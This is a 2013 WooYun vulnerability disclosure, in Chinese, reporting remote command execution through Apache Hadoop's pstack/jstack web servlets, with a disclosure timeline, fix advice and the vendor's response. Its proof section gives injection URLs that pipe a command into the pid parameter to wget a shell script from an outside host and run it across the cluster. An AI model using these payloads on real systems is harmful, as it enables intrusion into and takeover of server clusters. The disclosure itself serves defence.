漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-020282
漏洞标题:Apache Hadoop远程命令执行
相关厂商:Apache
漏洞作者: Bincker
提交时间:2013-03-18 23:51
修复时间:2013-05-02 23:52
公开时间:2013-05-02 23:52
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-18: 细节已通知厂商并且等待厂商处理中
2013-03-22: 厂商已经确认,细节仅向厂商公开
2013-04-01: 细节向核心白帽子及相关领域专家公开
2013-04-11: 细节向普通白帽子公开
2013-04-21: 细节向实习白帽子公开
2013-05-02: 细节向公众公开
简要描述:
通过hadoop,hbase,hdfs0.2 RC版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群
详细说明:
通过hadoop,hbase,hdfs低版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群。
漏洞证明:
通过hadoop,hbase,hdfs0.2 RC版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群。原因是 jstack pstack servlet 执行命令
远程执行命令,
http://hadoop_host:50060/pstack?pid=123|wget http://somehost/shell.sh
http://hadoop_host:50060/jstack?pid=123|wget http://somehost/shell.sh
进行任务分发,批量对集群进行命令执行
http://hadoop_host/pstack?pid=123|home/work/hadoop/streaming.jar /home/shell.sh
http://hadoop_host/jstack?pid=123|home/work/hadoop/streaming.jar /home/shell.sh
修复方案:
进行升级至最新稳定版本,对应服务器的默认50070,50075,50090端口的访问控制。
版权声明:转载请注明来源 Bincker@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2013-03-22 17:02
厂商回复:
先行确认,暂未在生产系统实例中复现。已作为重要事件列入处置队列。
按相邻网络攻击进行评估,rank=5.96*1.3*1.8(云安全)=13.946
最新状态:
暂无